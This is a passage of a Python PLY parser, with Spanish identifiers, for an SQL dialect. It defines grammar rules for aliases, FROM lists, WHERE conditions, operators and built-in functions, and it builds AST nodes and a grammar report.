'FUNCION : MIN'
def p_funcionMax(t):
'FUNCION : MAX'
def p_Alias(t):
'ALIAS : AS ID '
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"AS\" \"ID\"")
val_id = Id(t[2], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_AliasS(t):
'ALIAS : ID '
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"ID\"")
val_id = Id(t[1], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_AliasC(t):
'ALIAS : AS IDALIAS'
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"AS\" \"IDALIAS\"")
val_id = Id(t[2], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_AliasCS(t):
'ALIAS : IDALIAS'
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"IDALIAS\"")
val_id = Id(t[1], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_PFROM(t):
'PFROM : FROM LVALORESFROM '
global reporte_gramatical
reporte_gramatical.append("<PFROM> ::= \"FROM\" <LVALORESFROM>")
ret = Retorno(t[2].getInstruccion(), NodoAST('FROM'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_LValoresFrom(t):
'LVALORESFROM : LVALORESFROM COMA VALORFROM '
global reporte_gramatical
reporte_gramatical.append("<LVALORESFROM> ::= <LVALORESFROM> \",\" <VALORFROM>")
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val, NodoAST('Valor'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_LValoresFrom1(t):
'LVALORESFROM : VALORFROM '
global reporte_gramatical
reporte_gramatical.append("<LVALORESFROM> ::= <VALORFROM>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('Valor'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_ValoresFromIdAlias(t):
'VALORFROM : ID ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALORFROM> ::= \"ID\" <ALIAS>")
val_id = Id(t[1], t[2].getInstruccion())
ret = Retorno(val_id, NodoAST(t[1]))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ValoresFromId(t):
'VALORFROM : ID '
global reporte_gramatical
reporte_gramatical.append("<VALORFROM> ::= \"ID\"")
val_id = Id(t[1], None)
ret = Retorno(val_id, NodoAST(t[1]))
t[0] = ret
def p_ValoresFromSub(t):
'VALORFROM : PABRE SUBCONSULTA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALORFROM> ::= \"(\" <SUBCONSULTA> \")\" <ALIAS>")
ret = Retorno(Subconsulta(t[2].getInstruccion(), t[4].getInstruccion()), NodoAST('AS'))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_SubconsultaFrom(t):
'SUBCONSULTA : SELECT VALORES PFROM COMPLEMENTO '
def p_SubconsultaFromW(t):
'SUBCONSULTA : SELECT VALORES PFROM PWHERE COMPLEMENTO '
def p_Where(t):
'PWHERE : WHERE CONDICION '
def p_CondicionIgual(t):
'CONDICION : CONDICION IGUAL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.IGUAL),NodoAST("="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionDif(t):
'CONDICION : CONDICION DIF CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"<>\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.DIF),NodoAST("\\<\\>"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionDif1(t):
'CONDICION : CONDICION DIF1 CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"!=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.DIF),NodoAST("!="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMenor(t):
'CONDICION : CONDICION MENOR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"<\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MENOR),NodoAST("\\<"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMenorI(t):
'CONDICION : CONDICION MENORIGUAL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"<=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MENORIGUAL),NodoAST("\\<="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMayor(t):
'CONDICION : CONDICION MAYOR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \">\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MAYOR),NodoAST("\\>"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMayorI(t):
'CONDICION : CONDICION MAYORIGUAL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \">=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MAYORIGUAL),NodoAST("\\>="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionAnd(t):
'CONDICION : CONDICION AND CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"AND\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.AND),NodoAST("AND"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionOr(t):
'CONDICION : CONDICION OR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"OR\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.OR),NodoAST("OR"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionNot(t):
'CONDICION : NOT CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NOT\" <CONDICION>")
ret = Retorno(ExpresionUnaria(t[2].getInstruccion(), OPERACION_LOGICA.NOT), NodoAST("NOT"))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_CondicionParentesis(t):
'CONDICION : PABRE CONDICION PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"(\" <CONDICION> \")\"")
t[0] = t[2]
def p_CondicionMas(t):
'CONDICION : CONDICION MAS CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"+\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.MAS),NodoAST("+"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMenos(t):
'CONDICION : CONDICION MENOS CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"-\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.MENOS),NodoAST("-"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionPor(t):
'CONDICION : CONDICION POR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"*\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.POR),NodoAST("*"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionDiv(t):
'CONDICION : CONDICION DIVIDIDO CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"/\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.DIVIDIDO),NodoAST("/"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMod(t):
'CONDICION : CONDICION MODULO CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"%\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.MODULO),NodoAST("%"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionExp(t):
'CONDICION : CONDICION EXP CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"^\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.EXP),NodoAST("^"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionIs(t):
'CONDICION : CONDICION IS CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.IS),NodoAST("IS"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionIsN(t):
'CONDICION : CONDICION IS NULL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" \"NULL\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.ISNULL),NodoAST("IS NULL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionNotN(t):
'CONDICION : CONDICION NOT NULL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"NOT\" \"NULL\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.NOTNULL),NodoAST("NOT NULL"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionM(t):
'CONDICION : MENOS CONDICION %prec UMENOS'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"-\" <CONDICION>")
ret = Retorno(ExpresionUnaria(t[2].getInstruccion(), OPERACIONES.MENOS), NodoAST('-'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_CondicionP(t):
'CONDICION : MAS CONDICION %prec UMAS'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"+\" <CONDICION>")
ret = Retorno(ExpresionUnaria(t[2].getInstruccion(), OPERACIONES.MAS), NodoAST('+'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_CondicionExtract(t):
'CONDICION : EXTRACT PABRE DATETIME FROM PTIMESTAMP PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"EXTRACT\" \"(\" <DATETIME> \"FROM\" <PTIMESTAMP> \")\"")
ret = Retorno(Extract(t[5].getInstruccion(), t[3]), NodoAST('EXTRACT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_CondicionFuncionWhere(t):
'CONDICION : FUNCIONES_WHERE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCIONES_WHERE>")
t[0] = t[1]
def p_CondicionNum(t):
'CONDICION : NUMERO '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NUMERO\"")
ret = Retorno(Numero(t[1]),NodoAST(str(t[1])))
t[0] = ret
def p_CondicionDec(t):
'CONDICION : DECIMALN'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"DECIMALN\"")
ret = Retorno(Decimal(t[1]),NodoAST(str(t[1])))
t[0] = ret
def p_CondicionCad(t):
'CONDICION : CADENA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"CADENA\"")
ret = Retorno(Cadena(t[1]),NodoAST(t[1]))
t[0] = ret
def p_CondicionTrue(t):
'CONDICION : TRUE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"TRUE\"")
ret = Retorno(Booleano(t[1]),NodoAST(t[1]))
t[0] = ret
def p_CondicionFalse(t):
'CONDICION : FALSE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"FALSE\"")
ret = Retorno(Booleano(t[1]),NodoAST(t[1]))
t[0] = ret
def p_CondicionId(t):
'CONDICION : ID '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"ID\"")
ret = Retorno(Id(t[1],None),NodoAST(t[1]))
t[0] = ret
def p_CondicionIdP(t):
'CONDICION : ID PUNTO ID '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"ID\" \".\" \"ID\"")
val = Id(t[3], t[1])
ret = Retorno(val, NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_CondicionIdPor(t):
'CONDICION : ID PUNTO POR '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"ID\" \".\" \"*\"")
val = Id('*', t[1])
ret = Retorno(val, NodoAST('.'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_CondicionFuncionSistema(t):
'CONDICION : FUNCIONES_SISTEMA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCIONES_SISTEMA>")
t[0] = t[1]
def p_CondicionDatePart(t):
'CONDICION : DATE_PART PABRE CADENA COMA INTERVAL CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"DATE_PART\" \"(\" \"CADENA\" \",\" \"INTERVAL\" \"CADENA\" \")\"")
ret = Retorno(DatePart(t[3], t[6]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('DATE_PART'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[6]))
t[0] = ret
def p_CondicionCurrentDate(t):
'CONDICION : CURRENT_DATE '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"CURRENT_DATE\"")
ret = Retorno(CurrentDate(), NodoAST('CURRENT_DATE'))
t[0] = ret
def p_CondicionCurrentTime(t):
'CONDICION : CURRENT_TIME '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"CURRENT_TIME\"")
ret = Retorno(CurrentTime(), NodoAST('CURRENT_TIME'))
t[0] = ret
def p_CondicionTimeStamp(t):
'CONDICION : TIMESTAMP CADENA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"TIMESTAMP\" \"CADENA\"")
ret = Retorno(Timestamp(t[2]), NodoAST('TIMESTAMP'))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_CondicionBetween(t):
'CONDICION : CONDICION BETWEEN CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"BETWEEN\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[3].getInstruccion(), OPERACION_LOGICA.BETWEEN), NodoAST('BETWEEN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionNotBetween(t):
'CONDICION : CONDICION NOT BETWEEN CONDICION %prec NOTB'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"NOT\" \"BETWEEN\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[4].getInstruccion(), OPERACION_LOGICA.NOTBETWEEN), NodoAST('NOT BETWEEN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_CondicionBetweenSimetric(t):
'CONDICION : CONDICION BETWEEN SIMMETRIC CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"BETWEEN\" \"SIMMETRIC\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[4].getInstruccion(), OPERACION_LOGICA.BETWEENSIMMETRIC), NodoAST('BETWEEN SIMMETRIC'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_CondicionBetweenNotSimetric(t):
'CONDICION : CONDICION NOT BETWEEN SIMMETRIC CONDICION %prec NOTB'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"NOT\" \"BETWEEN\" \"SIMMETRIC\" <CONDICION>")
ret = Retono(ExpresionBinaria(t[1].getInstruccion(), t[5].getInstruccion(), OPERACION_LOGICA.NOTBETWEENSIMMETRIC), NodoAST('NOT BETWEEN SIMMETRIC'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_CondicionIsDistinct(t):
'CONDICION : CONDICION IS DISTINCT FROM CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" \"DISTINCT\" \"FROM\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[5].getInstruccion(), OPERACION_LOGICA.ISDISTINCT), NodoAST('IS DISTINCT'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_CondicionIsNotDistinct(t):
'CONDICION : CONDICION IS NOT DISTINCT FROM CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" \"NOT\" \"DISTINCT\" \"FROM\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(), t[6].getInstruccion(), OPERACION_LOGICA.ISNOTDISTINCT), NodoAST('IS NOT DISTINCT'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[6].getNodo())
t[0] = ret
def p_CondicionNull(t):
'CONDICION : NULL '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NULL\"")
ret = Retorno(Null(), NodoAST('NULL'))
t[0] = ret
def p_CondicionUnknown(t):
'CONDICION : UNKNOWN '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"UNKNOWN\"")
ret = Retorno(Unknow(), NodoAST('UNKNOW'))
t[0] = ret
def p_CondicionSubConsulta(t):
'CONDICION : PABRE SUBCONSULTA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"(\" <SUBCONSULTA> \")\"")
t[0] = t[2]
def p_CondicionFunciones(t):
'CONDICION : FUNCION PABRE ID PCIERRA'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCION> \"(\" \"ID\" \")\"")
val_id = Id(t[3], None)
ret = Retorno(FuncionAgregacion(t[1], val_id, None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_CondicionFunciones1(t):
'CONDICION : FUNCION PABRE ID PUNTO ID PCIERRA'
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <FUNCION> \"(\" \"ID\" \".\" \"ID\" \")\"")
val_id = Id(t[5], t[3])
ret = Retorno(FuncionAgregacion(t[1], val_id, None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_CondicionNow(t):
'CONDICION : NOW PABRE PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NOW\" \"(\" \")\"")
ret = Retorno(Now(), NodoAST('NOW'))
t[0] = ret
def p_FuncionesSistemaAlias(t):
'FUNCIONES_SISTEMA : ID_FUNCION PABRE LCONDICION_FUNCION PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION> \"(\" <LCONDICION_FUNCION> \")\" <ALIAS>")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_FuncionesSistema(t):
'FUNCIONES_SISTEMA : ID_FUNCION PABRE LCONDICION_FUNCION PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION> \"(\" <LCONDICION_FUNCION> \")\" \";\"")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_FuncionesSistemaString(t):
'FUNCIONES_SISTEMA : ID_FUNCION_S PABRE LCONDICION_FUNCION_S PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION_S> \"(\" <LCONDICION_FUNCION_S> \")\" <ALIAS>")
ret = Retorno(FuncionesSistema(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getHijo())
ret.getNodo().setHijo(t[5].getHijo())
t[0] = ret
def p_FuncionesSistemaString1(t):
'FUNCIONES_SISTEMA : ID_FUNCION_S PABRE LCONDICION_FUNCION_S PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= <ID_FUNCION> \"(\" <LCONDICION_FUNCION_S> \")\"")
ret = Retorno(FuncionesSistema(t[1], t[3].getInstruccion(), None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_FuncionesSistemaTrimA(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH CADENA FROM CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= \"TRIM\" \"(\" <LBOTH> \"CADENA\" \"FROM\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(FuncionTrim(t[3], t[4], t[6], t[8].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[4]))
ret.getNodo().setHijo(NodoAST(t[6]))
ret.getNodo().setHijo(t[8].getNodo())
t[0] = ret
def p_FuncionesSistemaTrim(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH CADENA FROM CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<FUNCIONES_SISTEMA> ::= \"TRIM\" \"(\" <LBOTH> \"CADENA\" \"FROM\" \"CADENA\" \")\"")
ret = Retorno(FuncionTrim(t[3], t[4], t[6], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[4]))
ret.getNodo().setHijo(NodoAST(t[6]))
t[0] = ret
def p_FuncionesSistemaTrimA1(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH FROM CADENA COMA CADENA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("\"TRIM\" \"(\" <LBOTH> \"FROM\" \"CADENA\" \",\" \"CADENA\" \")\" <ALIAS>")
ret = Retorno(FuncionTrim(t[3], t[5], t[7], t[9].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_FuncionesSistemaTrim1(t):
'FUNCIONES_SISTEMA : TRIM PABRE LBOTH FROM CADENA COMA CADENA PCIERRA '
global reporte_gramatical
reporte_gramatical.append("\"TRIM\" \"(\" <LBOTH> \"FROM\" \"CADENA\" \",\" \"CADENA\" \")\"")
ret = Retorno(FuncionTrim(t[3], t[5], t[7], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('TRIM'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
t[0] = ret
def p_Id_FuncionSubstring(t):
'ID_FUNCION_S : SUBSTRING '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION_S> ::= \"SUBSTRING\"")
t[0] = 'SUBSTRING'
def p_Id_FuncionLength(t):
'ID_FUNCION_S : LENGTH '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION_S> ::= \"LENGTH\"")
t[0] = 'LENGTH'
def p_Id_FuncionSubstr(t):
'ID_FUNCION_S : SUBSTR '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION_S> ::= \"SUBSTR\"")
t[0] = 'SUBSTR'
def p_LBOTHLeading(t):
'LBOTH : LEADING '
global reporte_gramatical
reporte_gramatical.append("<LBOTH> ::= \"LEADING\"")
t[0] = 'LEADING'
def p_LBOTHTrailing(t):
'LBOTH : TRAILING '
global reporte_gramatical
reporte_gramatical.append("<LBOTH> ::= \"TRAILING\"")
t[0] = 'TRAILING'
def p_LBOTHBoth(t):
'LBOTH : BOTH '
global reporte_gramatical
reporte_gramatical.append("<LBOTH> ::= \"BOTH\"")
t[0] = 'BOTH'
def p_LCondicionFuncion_Condicion(t):
'LCONDICION_FUNCION_S : CONDICION '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION_S> ::= <CONDICION>")
t[0] = t[1]
def p_LCondicionFuncion_S(t):
'LCONDICION_FUNCION_S : CONDICION COMA NUMERO COMA NUMERO '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION_S> ::= <CONDICION> \",\" \"NUMERO\" \",\" \"NUMERO\"")
val = [t[1].getInstruccion(), Numero(t[3]), Numero(t[5])]
ret = Retorno(val, NodoAST('PARAMETROS'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(str(t[3])))
ret.getNodo().setHijo(NodoAST(str(t[5])))
t[0] = ret
def p_IdFuncionAbs(t):
'ID_FUNCION : ABS '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"ABS\"")
t[0] = 'ABS'
def p_IdFuncionCBRT(t):
'ID_FUNCION : CBRT '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"CBRT\"")
t[0] = 'CBRT'
def p_IdFuncionCeil(t):
'ID_FUNCION : CEIL '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"CEIL\"")
t[0] = 'CEIL'
def p_IdFuncionCeiling(t):
'ID_FUNCION : CEILING '
global reporte_gramatical
reporte_gramatical.append("<ID_FUNCION> ::= \"CEILING\"")
t[0] = 'CEILING'
def p_LCondicionFuncion1(t):
'LCONDICION_FUNCION : CONDICION '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION> ::= <CONDICION>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_LCondicionFuncion(t):
'LCONDICION_FUNCION : LCONDICION_FUNCION COMA CONDICION '
global reporte_gramatical
reporte_gramatical.append("<LCONDICION_FUNCION> ::= <LCONDICION_FUNCION> \",\" <CONDICION>")
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_DateTimeYear(t):
'DATETIME : YEAR '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"YEAR\"")
t[0] = 'YEAR'
def p_DateTimeHour(t):
'DATETIME : HOUR '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"HOUR\"")
t[0] = 'HOUR'
def p_DateTimeMinute(t):
'DATETIME : MINUTE '
global reporte_gramatical
reporte_gramatical.append("<DATETIME> ::= \"MINUTE\"")
t[0] = 'MINUTE'
def p_DateTimeSecond(t):
'DATETIME : SECOND '
global reporte_gramatical
